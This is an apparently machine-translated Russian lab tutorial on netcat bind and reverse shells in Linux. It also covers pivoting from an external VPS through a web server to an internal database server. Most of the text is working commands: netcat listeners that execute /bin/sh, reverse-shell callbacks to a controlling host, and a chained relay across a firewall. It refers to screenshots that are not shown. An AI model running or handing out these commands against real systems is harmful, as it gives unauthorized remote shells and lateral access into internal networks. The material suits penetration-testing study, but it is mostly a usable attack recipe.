В этой демонстрации в среде Linux,
когда внешняя сетевая машина обычно используется для доступа к внутренней сетевой машине, часто используется обратная оболочка. Прямая оболочка часто используется между внутренней сетевой машиной и внутренней сетевой машиной.
Прямая оболочка
связана с внутренней сетью и граничным сервером. Поэтому сначала мы продемонстрируем прямую оболочку (прямая оболочка предназначена для мониторинга на целевой машине):
Команда на машине интрасети: nc -lvp 4444 -e / bin / sh
Команда на локальный компьютер: nc 10.0.78.41 4444
Показать уже подключенные,
чтобы проверить:
Это означает, что прямое соединение прошло успешно.
Обратная оболочка
должна отслеживать локальный vps и подключаться к целевой
машине. Команда на локальном компьютере: nc -lvp 9999
Команда на внутренней сетевой машине: nc 10.0.78.29 9999 -e / bin / sh
Показать уже подключенные,
чтобы проверить:
Объясните, что обратное соединение прошло успешно.
Затем потренируйтесь на удаленной внутренней сетевой машине с обратной оболочкой на внешней сетевой машине, используя пограничный сервер в качестве трамплина.
Условия подготовки:
1. Внешняя сетевая машина (vps)
2. Граничный сервер (веб-сервер )
3. Интранет-сервер (сервер базы данных)
Vps и веб-сервер, сервер базы данных разделен IP-адресом брандмауэра: 192.168.101.1, и
каждый IP-адрес выглядит следующим образом:
1. Внешний сетевой компьютер (vps)
2. Пограничный сервер (веб-сервер)
3. Интранет-сервер (сервер базы данных)
Затем
введите команду в vps: nc -lvp 1234
Введите команду на сервере базы данных: nc -lvp 1234 -e / bin / sh
Введите команду на веб-сервере: nc -v 10.0.78.29 1234 -c "nc - v 192.168.101.103 1234 "
Показать уже подключенные,
чтобы проверить:
Обнаружено, что IP-адрес является IP-адресом сервера базы данных на данный момент, успех